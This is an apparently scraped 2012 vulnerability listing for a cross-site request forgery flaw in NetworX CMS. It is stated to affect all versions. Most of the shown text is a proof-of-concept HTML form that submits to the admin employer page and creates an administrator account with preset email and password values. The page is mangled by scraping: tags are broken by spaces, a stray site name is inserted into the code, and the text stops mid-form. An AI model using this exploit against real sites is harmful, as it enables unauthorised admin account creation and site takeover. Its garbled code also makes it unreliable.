NetworX CMS-CSRF flaws add administrator accounts-vulnerability warning-the black bar safety net

2012-04-17T00:00:00
ID MYHACK58:62201233686
Type myhack58
Reporter 佚名
Modified 2012-04-17T00:00:00

Description

Title: NetworX CMS - CSRF Add Admin

Author: N3t. Crack3r

Program address: http://www.socialabc.com/downloads/networx-social/

Affect all versions

Test System Platform: [Ubuntu]

Demo Station: http://www.socialabc.com/demo/

< !--

//================================================================================

// Login info : Email : adm@hackw0rms.net pass:t00r

root@SecBoX:~# cat poc.php -->

< html>

< head>

<script language="javascript">

function country_changed()

{

document. getElementById('hdnSubmited'). value = 'change_country';

document. getElementById('frmMain'). submit();

}

</script>

< /head>

< form action="http://www.2cto.com /admin/employer.php" form method="post" id="frmMain">

< input type="hidden" name="submited" value="save" id="hdnSubmited">

< br>

< p class="text_14 bold" align="center">NetworX CSRF - Add Admin</p>

<table cellpadding="5" border="0">

<tr>

<td align="right" class="text_12">Email:</td>

<td colspan="3">

<input type="text" name="UserEmail" value="adm@hackw0rms.net">

</td>

</tr>

<tr>

<td align="right" class="text_12">Password:</td>

<td colspan="3">

<input type="password" name="Password" value="t00r">

</td>

</tr>

<tr>

<td align="right" class="text_12">First Name:</td>

<td><input type="text" name="UserFirstname" value="Hack" class="t_box" style="width:150px;"></td>

<td align="right" class="text_12">Last Name:</td>

<td><input type="text" name="UserLastname" value="W0rm" class="t_box" style="width:150px;"></td>

</tr>

<tr> www.2cto.com

<td align="right" class="text_12">Country:</td>

<td colspan="3">

<select name="UserCountry" onchange="country_changed()">

<option value="{ID}" {selected}>United state of Islam</option>

</select>

</td>

</tr>

<tr>

<td align="right" class="text_12">Address:</td>

<td colspan="3">

<input type="text" name="UserAddress1" value="6 9 1 3 3 7 st" class="t_box" style="width:400px;">

</td>

</tr>

<tr>

<td align="right" class="text_12">City / Town:</td>

[1] [2] next